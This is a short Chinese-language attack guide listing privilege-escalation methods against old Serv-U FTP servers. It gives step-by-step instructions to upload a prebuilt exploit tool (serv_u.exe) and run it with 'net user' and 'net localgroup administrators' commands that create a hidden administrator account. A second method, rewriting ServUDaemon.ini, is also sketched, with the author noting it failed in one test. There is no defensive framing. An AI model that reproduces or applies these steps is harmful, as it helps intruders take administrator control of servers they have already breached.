主要提权方法:
一、serv-u ftp本地溢出权限提升(使用6.0以及以前版本)
1、用Serv-U提权综合工具生成提权工具serv_u.exe
2、先上传 serv_u.exe 到一个盘符下 比如是d盘
3、执行命令 d:\serv_u.exe
4、d:\serv_u.exe “net user username password /add” (注意命令要有引号)
5、d:\serv_u.exe “net localgroup administrators username /add” (注意命令要有引号)
二、ServUDaemon.ini 文件重写后提权(对ServUDaemon.ini有写入的权限)。注意,我在serv-u6.4.06中测试没有成功,即虽然FTP用户添加成功,但添加的用户没有命令执行权限(虽然显示添加的用户是管理员用户)。所以,在实际环境中本方法不一定成功,不过要尝试以下。